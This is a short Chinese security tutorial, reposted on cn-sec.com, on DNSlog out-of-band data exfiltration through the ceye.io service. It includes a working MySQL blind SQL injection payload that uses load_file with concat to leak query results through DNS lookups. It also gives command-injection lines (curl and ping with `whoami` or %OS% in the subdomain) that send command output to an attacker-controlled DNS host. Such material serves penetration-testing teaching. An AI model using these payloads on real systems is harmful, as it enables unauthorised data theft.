利用 dnslog 回显

admin
admin
admin
138674
文章
114
评论
2023年12月15日00:52:30评论21 views字数 517阅读1分43秒阅读模式

DNS 在解析的时候会留下日志, 通过读取多级域名的解析日志, 来获取信息

简单来说就是把信息放在二级域名中, 传递到自己这, 然后读取日志, 获取信息

利用 dnslog 可以回显 sql 盲注的数据、命令执行的结果等

知道创宇的 dnslog 平台

ceye.io

登录之后 右上角 Profile

http://cn-sec.com/wp-content/uploads/2023/12/20231214161625-88.jpg

Identifier 就是 dnslog 测试地址

访问 test.xxxx.ceye.io

http://cn-sec.com/wp-content/uploads/2023/12/20231214161625-30.jpg

后台 dnslog 记录

http://cn-sec.com/wp-content/uploads/2023/12/20231214161625-1.jpg

SQL 盲注

以 mysql 为例

load_file('\\\\xxxx.com\\')

可以发起网络请求

http://cn-sec.com/wp-content/uploads/2023/12/20231214161625-97.jpg

记录

http://cn-sec.com/wp-content/uploads/2023/12/20231214161625-73.jpg

盲注

and if((select load_file(concat('\\\\',(PAYLOAD),'.xxoo.ceye.io\\abc'))),1,1)

因为不能直接 id=1 and select xxx 就用 if 来执行

PAYLOAD 记得写上 limit

命令执行

执行反引号内的内容并作为结果输出

curl [反引号]whoami[反引号].xxxx.ceye.io

ping [反引号]whoami[反引号].xxxx.ceye.io

http://cn-sec.com/wp-content/uploads/2023/12/20231214161626-91.jpg

dnslog

http://cn-sec.com/wp-content/uploads/2023/12/20231214161627-42.jpg

感觉鸡肋啊…

ping %OS%.xxoo.ceye.io

%OS% 操作系统名称

- By:X1r0z[exp10it.cn]

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日00:52:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   利用 dnslog 回显https://cn-sec.com/archives/2301328.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息